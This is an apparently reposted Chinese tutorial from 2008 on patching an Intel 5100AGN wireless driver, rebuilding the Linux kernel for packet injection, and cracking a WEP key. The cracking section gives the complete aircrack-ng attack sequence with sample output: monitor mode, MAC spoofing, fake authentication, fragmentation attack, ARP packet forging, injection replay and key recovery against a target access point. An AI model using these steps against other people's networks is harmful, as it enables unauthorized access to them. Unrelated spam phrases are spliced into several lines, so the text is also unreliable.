Linux下使用Intel WiFi Link 5100AGN 研究学习WEP密码
Linux下使用Intel WiFi Link 5100AGN 破解WEP密码
ID:draapho  别名:mousie
2008年12月4日    撰写此文
前言
之前写过一篇《XP下使用Intel WiFi Link 5100AGN 破解WEP密码》的文章,但毕竟限制条件太多,破解速度太慢。经过google,还是google,非常幸运的走过了Ubuntu Linux的安装,终端中敲指令,对网卡驱动打补丁,升级内核,最终成功了有资格写下这篇菜鸟级别的文章了。Linux高手请无视,因为我还是一个对cd指令都要google的超级菜菜鸟……
说明文中的红字体都是在终端(shell)中要输入的内容。
本文参考的非常重要的三个网站如下:
1./?p=linux/kernel/git/linville/wireless‐testing.git;a=commit;h=84e8e77f61
8f589316e83dfa1bfafe5a47bf0bd2
该网站为5100AGN提供了支持注入的驱动升级,提供了C源代码 和 diff文件。
2.tinyshell.be/aircrackng/forum/index.php?topic=4217.0
该网站验证了5100AGN能工作于注入模式,并提供升级网卡驱动的思路。
3.www.wlanbbs
中国无线论坛网,着重参考了“中卫”写的《BT3破解无线WEP/WPA教程》。
测试环境说明
1.测试目的: 破解WEP密码
2.测试系统: Ubuntu Linux 8.10
3.测试网卡: Intel WiFi Link 5100AGN
4.破解软件: aircrack
5.网卡驱动: Stefanik Gábor 2008年9月23日写的驱动
XP下的准备工作
Linux下当然都能完成这些准备工作,不过是菜鸟么,怎么熟悉怎么来。
1.安装Ubuntu 8.10,新手建议在Windows下使用wubi直接安装,非常非常的方便!
2./pub/linux/kernel/v2.6/ 选择 linux‐2.6.27. 下载。当然日后更新的
内核版本应该也能使用,目前能确认的是2.6.27‐rc7,2.6.27‐rc8的内核版本都能使用。
3./?p=linux/kernel/git/linville/wireless‐testing.git;a=commit;h=84e8e77f61
8f589316e83dfa1bfafe5a47bf0bd2 下载3个支持注入的5100AGN的驱动源文件,名字为iwl‐agn.c和iwl‐sta.c以及 iwl‐tx.c。
4.为图方便,可以在XP下查看好要破解WEP的SSID、MAC地址、工作信道等信息,并用
txt文件保存好。
Ubuntu下的准备工作
1.装好的Ubuntu网卡驱动是直接支持5100AGN的,只是不能工作在注入模式。首先还是
需要一个可用的网络来下载点东西。
2.进入root权限。Ubuntu默认情况不允许用root帐户登陆,获得root权限的方法很多,
讲个对日后操作最方便的方法。
首先,打开终端,输入指令sudo passwd root,设置新的root帐户密码。
毛冬瓜
然后在左上角点击System‐>Preferences‐>Login Window菜单,选择Security选项,
接着选中其中的“Allow Local system administrator login”选项,确认设置。
最后Ctrl+Alt+退格,输入root及密码重新登陆即可。
这样就永久获得了root权限,可以在Ubuntu中随意的用鼠标拷贝粘贴文件了。
3.sudo apt‐get install aircrack,安装破解软件aircrack
4.下载一些配置要用的软件(如果并不想自己配置内核,可跳过)
sudo apt‐get install build‐essential bin86 kernel‐package单田芳经典评书大全
sudo apt‐get install libqt3‐headers libqt3‐mt‐dev
梦到妻子怀孕
5.稍等片刻,全部下载安装完成后,开始更新网卡驱动,编译Linux内核。
打开并解压缩下载的linux‐2.6.27.7的内核,把解压后的文件整个拷贝到 /usr/src的目录下。在这个目录下,还会有几个别的版本的内核文件在呢。
打开这个新内核 /drivers/net/wireless/iwlwifi/,用下载的支持注入的iwl‐agn.c和iwl‐sta.c 以及iwl‐tx.c三个文件覆盖掉原来的文件。
6.sudo mv linux linux.bak,确保没有叫linux的这个链接(好像和快捷方式的概念差不多)
sudo ln ‐s ./linux‐2.6.27.7 linux,把下载的新内核链接到linux
cd linux,进入linux这个目录
7.配置内核。配置内核是件困难的事情!参数繁多,一不小心就会导致升级失败。所以基
本思路是把当前内核配置文件拷贝过来一用。
sudo cp /boot/config‐`uname ‐r` .config,复制当前的内核配置。
sudo make xconfig,当然如果想自己再看看配置,微调一下也可以。然后会弹出一个配置内核的窗口,对配置内核感兴趣的google,我基本没改。
8.弄了份现成的配置文件,下一步就是编译了。为以后升级方便,先打包成deb包。
cd /usr/src/linux
sudo ‐s –H
make‐kpkg clean
sudo make‐kpkg ‐‐initrd –revision=diy1  kernel_image kernel_headers
最后行输入完毕后,编译需要一个多小时,在确认开始编译后,该干吗干吗去!
9.安装新的内核。在你的耐心差不多消磨至尽的时候,破解的准备工作也到了最后一步了。
sudo dpkg ‐i /usr/src/kernel‐image‐2.6.27.7*.deb,安装内核包
sudo dpkg ‐i /usr/src/kernel‐headers‐2.6.27.7*.deb,安装内核headers包
也非常有必要到/usr/src中把这两个deb文件给拷贝出来,下次重装Linux升级可就不用这么麻烦了。
sudo dpkg -i <name of the file>,设置grub默认引导
现在重启一下,如果顺利,会自动进入2.6.27.7的新内核。
破解WEP密码
1.做了这么多准备工作,终于可以开始动手做想做的事情了。建议大家先别急着输指令,
可以新建个文本文件,把要输入的指令,要破解的SSID号,MAC地址,信道等等全部安安心心的用拷贝、粘贴大法全部清晰的输入好。
2.新建一个终端
sudo –s
可省,输入密码后,进入root权限。
lsmod
可省,查看驱动列表。反馈信息如下,可以在里面到5100AGN的驱动。
Module    Size  Used by
nls_iso8859_1  12288  1
nls_cp437    13952  1
vfat    18816  1
fat    57504  1 vfat
............
modinfo iwlagn
可省,查看网卡驱动的详情。反馈信息如下。
filename:  /lib/modules/2.6.27.7/kernel/drivers/net/wireless/iwlwifi/iwlagn.ko
alias:  iwl4965
license:  GPL
author:  Copyright(c) 2003‐2008 Intel Corporation
version:    1.3.27ks
description: Intel(R) Wireless WiFi Link AGN driver for Linux
firmware:  iwlwifi‐4965‐2.ucode
srcversion: xxxxxxxxxxxxxxxxxxxxxxx
ifconfig –a
可省,查看本机网卡详情。反馈信息如下
eth0  Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx
哪天是情人节UP BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
2022跨年文案短句
Interrupt:219 Base address:0x8000
Lo  Link encap:Local Loopback
inet addr:127.0.0.1  Mask:255.0.0.0
UP LOOPBACK RUNNING  MTU:16436  Metric:1
RX packets:246 errors:0 dropped:0 overruns:0 frame:0
TX packets:246 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15408 (15.4 KB)  TX bytes:15408 (15.4 KB)
pan0  Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx
BROADCAST MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
泛的拼音和组词wlan0  Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST  MTU:1492  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:5188 (5.1 KB)  TX bytes:3895 (3.8 KB)
wmaster0  Link encap:UNSPEC  HWaddr xx‐xx‐xx‐xx‐……
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
特别关注下深绿标注的地方,wlan0为网卡代号,xx:xx:xx:xx:xx:xx为本机MAC。 airmon‐ng
可省,查看本机的网卡。反馈信息如下
Interface Chipset  Driver
wlan0    iwlagn ‐ [phy0]
macchanger –m 00:11:22:33:44:55 wlan0
可省,修改自己网卡的MAC地址。当对方设置了MAC地址过滤时才有必要用吧,要用的话需要下载一下的。
airmon‐ng start wlan0 6
必须的!让网卡在信道6处监听信息。数字6就是要破解AP的工作信道(channel)。
Interface Chipset  Driver
wlan0    iwlagn ‐ [phy0]
(monitor mode enabled on mon0)
会返回一个mon0处于监听模式的提示,输入第二次的话会变成mon1,类推。
aireplay‐ng ‐9 mon0
可选,测试注入攻击。如果测试通过,破解WEP就易如反掌了。反馈信息如下  21:00:55  Trying broadcast
21:00:55  Injection is working!
21:00:56  Found 3 APs
……
如果第二行返回值是No Answer,可能原因有很多,其中包括网卡驱动的问题。
如果第二行返回值是Injection is working,就说明网卡已经工作在注入攻击模式下。
然后软件会去ping每个到的AP,这里可以得到信道上所有AP的SSID、MAC、信道、信号强度等等。
airodump‐ng –ivs –w name –c 6 mon0
必须的!抓ivs包,name为储存文件的名字,6为信道,然后会有个一直在抓包的界面 BSSID    PWR RXQ Beacons  #Data,  #/s CH MB  ENC CIPHER AUTH ES
xx:xx:xx:xx:xx:xx  179  3  159      0    0  6  54.  WEP  WEP      T 特别关注 #Data 这栏,它的值就是抓到的ivs的数量,目前涨的很慢,当我们在第二个终端中敲几个指令后,就会发现它涨的飞快,过了1万,就可以用第三个终端来破解密码了!
3.新建第二个终端,不要关掉第一个终端!
aireplay‐ng ‐1 0 ‐e TP‐LINK ‐a 000000000000 ‐h 111111111111 mon0
必须的!进行伪装链接,TP‐LINK为要破解AP的SSID,000000000000为要破解AP的MAC地址,111111111111为本机网卡的MAC地址,如果用macchanger伪装过,就输入伪装后的MAC地址。
aireplay‐ng ‐5 ‐b 000000000000 ‐h 111111111111 mon0
必须的!获得至关重要的xor文件,参数说明同上个指令。需要一点点抓有效包的时间。
成功以后输入y,会得到一个fragment‐XXXXX‐的文件,XXXXX是数字。
packetforge‐ng ‐0 ‐a 000000000000 ‐h 111111111111 ‐k 255.255.255.255 ‐l 255.255.255.255 ‐y fragment‐XXXXX‐ ‐w mrarp
必须的!参数说明同上个指令。fragment‐XXXXX‐就是上个指令中获得的文件。
aireplay‐ng ‐2 ‐r mrarp ‐x 1024 mon0
必须的!注入攻击。
此时第一个终端内的#Data栏的值应该在飞速增长。
4.新建第三个终端,前两个终端都不要关闭。
在 #Data栏的数据达到10000以上时,就可以破解了。
aircrack‐ng ‐n 64 ‐b 000000000000 name‐01.ivs
必须的!破解WEP密码,000000000000是要破解AP的MAC地址。
一般地,几秒内密码就出来了。如果对方的密码设置的比较牛,多抓些ivs包后再破解即可。保存好WEP密码,退出三个终端。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。